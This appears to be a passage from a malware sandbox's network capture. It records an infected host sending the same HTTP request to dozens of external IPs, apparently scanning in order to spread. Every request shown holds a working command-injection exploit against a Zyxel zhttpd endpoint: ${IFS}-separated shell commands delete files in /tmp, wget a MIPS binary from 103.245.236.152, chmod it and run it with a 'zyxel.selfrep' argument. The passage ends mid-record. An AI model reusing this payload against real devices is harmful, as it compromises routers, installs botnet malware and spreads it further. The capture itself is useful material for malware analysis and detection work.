                                      Jan 14, 2024 15:50:34.003119946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1202192.168.2.1443740176.53.93.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.003154993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1203192.168.2.1443574155.79.157.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.003197908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1204192.168.2.144014051.224.240.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.003236055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1205192.168.2.1449426161.214.166.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.003294945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1206192.168.2.1449318194.38.9.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.003355980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1207192.168.2.145827478.130.223.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.003386021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1208192.168.2.1443454133.39.205.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.003438950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1209192.168.2.1435346147.103.113.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.003459930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1210192.168.2.1438062167.66.88.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.003485918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1211192.168.2.1454772201.43.59.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.003562927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1212192.168.2.145694632.26.110.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.003607035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1213192.168.2.144050866.27.197.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.003660917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1214192.168.2.1452434145.19.252.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.003709078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1215192.168.2.143700846.238.152.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.003743887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1216192.168.2.143526859.142.102.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.003789902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1217192.168.2.1454672130.54.58.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.003834009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1218192.168.2.146035659.235.132.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.003870964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1219192.168.2.1456080166.82.124.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.003892899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1220192.168.2.1450208117.143.132.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.003945112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1221192.168.2.144379054.208.87.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.003969908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1222192.168.2.1448658219.24.25.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.004029036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1223192.168.2.1443670222.134.233.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.004050970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1224192.168.2.1456976161.208.115.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.004098892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1225192.168.2.1439066180.118.182.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.004148960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1226192.168.2.1439748208.104.254.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.004192114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1227192.168.2.145542253.245.61.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.004203081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1228192.168.2.1443982211.89.7.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.004275084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1229192.168.2.144763480.107.32.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.004314899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1230192.168.2.143824684.166.198.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.004343033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1231192.168.2.143853451.254.129.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.004384995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1232192.168.2.1460508152.65.197.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.004410982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1233192.168.2.1454456220.162.130.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.004475117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1234192.168.2.145939232.212.145.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.004519939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1235192.168.2.1434084118.33.228.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.004544973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1236192.168.2.1450020187.62.183.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.004578114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1237192.168.2.1457176170.150.109.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.004638910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1238192.168.2.143507089.61.20.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.004673958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1239192.168.2.1448092133.42.214.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.004697084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1240192.168.2.1444894138.141.135.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.004754066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1241192.168.2.145999470.149.7.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.004806042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1242192.168.2.1435532208.37.28.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.004843950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1243192.168.2.144935299.194.211.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.004877090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1244192.168.2.1437588103.108.234.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.004914045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1245192.168.2.1451422199.33.162.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.004951000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1246192.168.2.1449568106.154.1.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.004983902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1247192.168.2.143398063.5.211.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.005038977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1248192.168.2.145133459.168.215.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.005084038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1249192.168.2.144966072.17.53.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.005143881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1250192.168.2.144401032.198.161.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.005166054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1251192.168.2.1445018166.107.142.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.005211115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1252192.168.2.143861438.29.59.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.005253077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1253192.168.2.1446476117.3.247.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.005300045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1254192.168.2.144682693.104.27.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.005350113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1255192.168.2.1460828130.131.164.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.005363941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1256192.168.2.143799667.114.47.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.005412102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1257192.168.2.1436142168.1.59.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.005461931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1258192.168.2.145898280.81.157.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.005495071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1259192.168.2.1445348194.131.184.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.005518913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1260192.168.2.1456098184.235.34.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.005547047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1261192.168.2.1441394142.79.224.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.005580902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1262192.168.2.146054824.64.67.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.005620003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1263192.168.2.144768035.253.124.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.005647898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1264192.168.2.1459810113.104.246.46443
                                      TimestampBytes transferredDirectionData
